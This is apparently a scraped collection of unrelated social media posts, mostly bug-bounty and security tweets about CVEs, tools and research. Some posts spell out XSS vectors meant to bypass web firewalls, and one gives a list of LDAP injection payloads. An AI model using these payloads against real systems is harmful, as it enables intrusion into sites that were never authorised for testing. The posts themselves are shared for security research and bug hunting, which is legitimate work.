Got a new CVE 😃 Title: phpList Authentication Bypass CVE ID: CVE-2020-8547 Vulnerability Type: PHP type Juggling / Loose Comparison

A WAF killer variant of the previous vector by zseano <imsofake onpointerrawupdate=alert(1)>test

[+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip

My list of 137 publicly reported Chinese espionage cases against🇺🇸since 2000. The list doesn't include 4🇨🇳PLA hackers charged 4 hacking into credit reporting agency Equifax today. shorturl.at/nRTU3 Now I share both w/ you & Consul General CG_Zha Liyou查立友. csis-prod.s3.amazonaws.com/s3fs-public/19…

xueqiu.com/9455873430/143… $微博(WB)$ #新浪微博、微博借钱 就是骗子公司，套路贷和高利贷# 英语不好，谁有能力投诉到美国证监会，以及apple，让其下架？ 翻译投诉等我可以适当付费。

CVE-2020-10204 Nexus Repository Manager 3 - Remote Code Execution Well, EL Injection support.sonatype.com/hc/en-us/secti…

🔒New CryptoTester v1.4.0.2 for #ransomware analysis 🔎: TONS of fixes/additions to hexboxes, grouped algorithms in dropdown, flip endianness of keys, AES XTS mode, HMAC key derives, raw RSA (provide n + d/e, no padding), redesigned bruteforce key tool, lots of bugfixes.

A CSS transition-based one by PortSwigger Research <style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)>

6000+ hackerone disclosed reports docs.google.com/spreadsheets/d… #bugbountytips #bugbountytip #bugbounties #hackerone #vulnerabilities #xxe #xss #sqli #ssrf #RCE

Playing with GZIP! All versions of GLPI, an open source IT asset management app, released in the last 10 years are vulnerable to an RCE (CVE-2020-11060) flaw through backup feature. offsec.almond.consulting/playing-with-g… The bug has been patched with the release of v9.4.6. via Almond OffSec

A vector by Cure53 <xss onbeforescriptexecute=alert(1)><script>1</script>

LDAP Injection 💥 1/3 Payloads : * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y #bugbountytips #shieldindia

2 years have passed and he still didn't crack none of them! Lol! ("Multi One Password" is indeed a Real and The Most Secure #PasswordManager!) x.com/WPA_1/status/1… . Terahash Jeremi M Gosney L0phtCrack #Infosec #netsec #cybersec #cybersecurity #hashcat #bcrypt #defcon

"VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive" #infosec #redteam #redteam horizon3.ai/vmware-authent…

What would you do if you could spend 1 week with the creators of the most widely-used bug finding tools? * AFL++ * LibFuzzer / ASAN * Syzkaller * KLEE * OSSFuzz * OneFuzz * SQLancer * FuzzingBook / DebuggingBook * Infer * Clang SA * Findbugs / Tricorder * Soot / FlowDroid ...

既然有朋友问如何入门 Web3 安全（尤其是智能合约安全），我简单列点当下觉得还不错的资源吧。牢记下：这玩意，最重要的是实战，是需要你一天到晚长期在这个领域积累，才可能有些成就。另外，兴趣一定是最大的驱动力，三天打鱼两天撒网，那不叫兴趣，那叫自欺欺人...

We've analyzed the patch diffs for CVE-2023-3519 (Citrix Pre-Auth RCE) and have published our findings so far on our blog post here: blog.assetnote.io/2023/07/21/cit… So far, we haven't found an endpoint where this issue is exploitable without SAML being enabled. Will update blog if we

github.com/elastic/otel-p… 可以直接支持JAVA、PHP、Python、GO等高级语言程序的可观测性。不依赖高级语言的符号表、DWARF信息，直接解析到JAVA层的语言符号。 笔者稍微实验了一下，甚至可以作为未来RASP的技术方案。规避了Java Agent动态注入带来STW性能抖动的问题。强得可...可...可...怕...怕...。

主打一个猜。